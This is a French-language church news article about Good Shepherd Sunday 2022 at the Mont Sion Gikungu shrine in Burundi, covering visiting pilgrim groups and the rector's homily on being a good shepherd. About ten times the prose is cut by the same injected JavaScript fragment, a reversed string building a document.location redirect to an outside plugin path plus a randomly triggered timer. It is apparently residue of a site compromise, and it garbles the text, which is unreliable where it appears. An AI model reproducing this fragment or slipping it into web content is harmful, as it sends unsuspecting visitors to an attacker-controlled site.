Le sanctuaire de la Reine de la paix et la réconciliation de Mont Sion Gikungu a accueilli plus d’un groupe de pèlerins en ce quatrième dimanche de Pâques de cette année 2022. Ces pèlerins avaient des raisons différentes pour leur pèlerinage vers ce lieu sacré. Le premier groupe était composé de fratres de plus d’une centaine, venus du Grand Séminaire Saint Curé d’Ars de Bujumbura, ils ont cultivé cette habitude de faire leur pèlerinage vers Mont Sion Gikungu chaque dimanche du Bon Pasteur. Les seconds étaient les membres de la Chorale Saint Tharcisse de Matara venus quant à eux pour une visite de courtoisie et d’amitié à leurs confrères de la Chorale Saint Nicolas de Flue. A côté de ces deux groupes venus de l’extérieur, la Commission Protocole fêtait son quinzième anniversaire d’apostolat au sein du sanctuaire.

Le Père Recteur du sanctuaire a accueilli avec joie tous ces pèlerins et a communiqué aux fidèles leur présence ainsi que les motifs de leur pèlerinage. Notons que le même dimanche était consacré à la journée des vocations, selon la vision de l’Eglise. Les lectures du jour ont fait ressentir les festivités du dimanche du Bon Pasteur : le Livre des Actes des Apôtres (13, 14. 43-52), l’Apocalypse de Saint Jean (7, 9. 14-17) ainsi que l’Evangile selon Saint Jean (10, 27-30). La Chorale Saint Nicolas de Flue a alterné avec la chorale des visiteurs en animant la célébration eucharistique en chants liturgiques. Comme dimanche des vacations, le Père Recteur a précisé que la communauté des Pères de Schoenstatt compte au total trente-neuf (39) fratres et candidats toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont seize (16) séminaristes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont deux Nigérians qui sont presque au bout de leur stage au Burundi, des novices qui sont allés au Nigéria pour leur étude théologique et les candidats dans la communauté. Ils toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent faire entre dix et onze ans de cursus avant de parvenir au Sacrement d’Ordre.

Dans sa prédication homilétique, la Père Recteur du Sanctuaire a tenu à souhaiter de nouveau à tout un chacun la bonne fête du Bon Pasteur. Nous sommes tous rassemblés par le seul Berger qui est le seul Bon Pasteur qui nous appelle ses brebis a-t-il dit en substance. ‘La caractéristique de ces brebis est de pouvoir entendre et reconnaître la voix du berger, de s’en réjouir et de le suivre’, aprécisé le Père Recteur. Ce Bon Pasteur a un comportement qui le distingue de celui des autres bergers, il connaît toutes ses brebis par leurs noms et prend soin de chacune d’elles de sorte qu’aucune n’échappe à sa vigilance. Dès lors, toute personne qui a une responsabilité quelle qu’elle soit toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit se comporter en bon pasteur envers les personnes pour qui il est chef, dirigeant ou responsable. Pour les brebis, elles toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent reconnaître la voix de leur berger qui est différente de celle des autres. Le Bon Pasteur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont nous parlons aujourd’huia le pouvoir sur tout et sur toute personne de même qu’il peut arracher ses brebis du tombeau et de la mort comme il l’a fait à Lazare qui était mort il y avait de cela quatre jours a-t-il poursuivi. A la fin de tout, il est ressuscité d’entre les morts pour que le monde en soit convaincu. Son objectif est qu’il y ait un seul troupeau pour toutes les brebis comme il y a un seul Berger et Pasteur.

Dans la deuxième lecture, des gens venus de toutes les nations étaient devant le trône de l’agneau. C’est ce même agneau qui garde ses brebis dans un seul troupeau et les fait boire de l’eau qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne la vie.  Pour cela les cris et querelles des peuples de ce monde, tant avides des biens matériels, sont sans raison. Avec la fête du Bon Pasteur, chaque chrétien partage le fait d’être pasteur car il est responsable de la vie et la survie de son prochain. Chaque chrétien devrait alors aider à rassembler le troupeau du Bon Pasteur afin qu’il habite dans un même troupeau. Cette tâche revient à toute personne baptisée : prêtre, sœur, politicien, économiste, etc. Toutes ces personnes devraient avoir conscience qu’elles ne sont pas uniquement des consommateurs des sacrements mais qu’elles aident dans l’apostolat. ‘Ne soyons pas comme Caïn qui n’a pas voulu être gardien de son frère Abel. Il a dévié toute sa responsabilité et il a fini par en souffrir. Nous frères et sœurs toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent manger, souffler et vivre en paix grâce à notre concours. C’est d’ailleurs ce que le Pape ne cesse de nous rappeler’, a martelé le Père Recteur.

Faisons un examen de conscience pour savoir ce que nous sommes pour notre prochain a-t-il conseillé, car si nous constatons que notre comportement n’est pas celui d’un bon pasteur envers lui, changeons sans plus rien attendre. Evitons, autant que faire se peut d’être comme Caïn. Exerçons –nous à voir la perfection dans l’autre : voyons un aigle dans un œuf et un saint dans un pécheur. Une pierre est sans effet devant l’œil d’un observateur, mais c’est une matière précieuse pour un forgeron, un tailleur de pierres et un maçon. Ayons une vision semblable à celle de Jésus qui voit un chef dans Pierre qui l’a renié trois fois, il voit un apôtre des nations en Saul qui l’avait persécuté. N’ayons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc pas un œil aveugle et vengeur envers notre prochain parce que nous avons eu la joie de connaitre Dieu et sa Parole. Accueillons la Bonne Nouvelle qui nous invite à voir dans l’autre un ami, un frère et un soutien qui nous aidera à traverser la rivière et à résister aux vents violents. Enfin, nous sommes tous appelés à être de bons pasteurs qui veulent aider à rassembler toutes les brebis dans un seul troupeau.

Que la Vierge Marie réveille en nous cet esprit de toujours veiller sans cesse sur nos prochains a-t-il conclu.

NYANDWI M.